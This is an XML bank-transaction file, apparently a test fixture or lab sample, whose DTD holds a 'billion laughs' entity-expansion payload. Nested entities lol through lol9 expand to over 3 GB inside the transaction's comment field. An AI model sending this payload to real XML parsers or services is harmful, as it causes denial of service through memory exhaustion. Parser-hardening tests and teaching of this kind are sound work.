<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE transactions [
        <!ELEMENT fromAccountNo (#PCDATA)>
        <!ELEMENT toAccountNo (#PCDATA)>
        <!ELEMENT amount (#PCDATA)>
        <!ELEMENT currency (#PCDATA)>
        <!ELEMENT comment (#PCDATA)>
        <!ELEMENT transaction (fromAccountNo, toAccountNo, amount, currency, comment)>
        <!ELEMENT transactions (transaction*)>
        <!ENTITY lol "lol">
        <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
        <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
        <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
        <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
        <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
        <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
        <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
        <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
        <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
        ]>
<transactions>
    <transaction>
        <fromAccountNo>2-123456-22</fromAccountNo>
        <toAccountNo>1-123456-11</toAccountNo>
        <amount>100</amount>
        <currency>CHF</currency>
        <!-- if fully expanded this payload will be larger than 3 Gbytes-->
        <comment>&lol9;</comment>
    </transaction>
</transactions>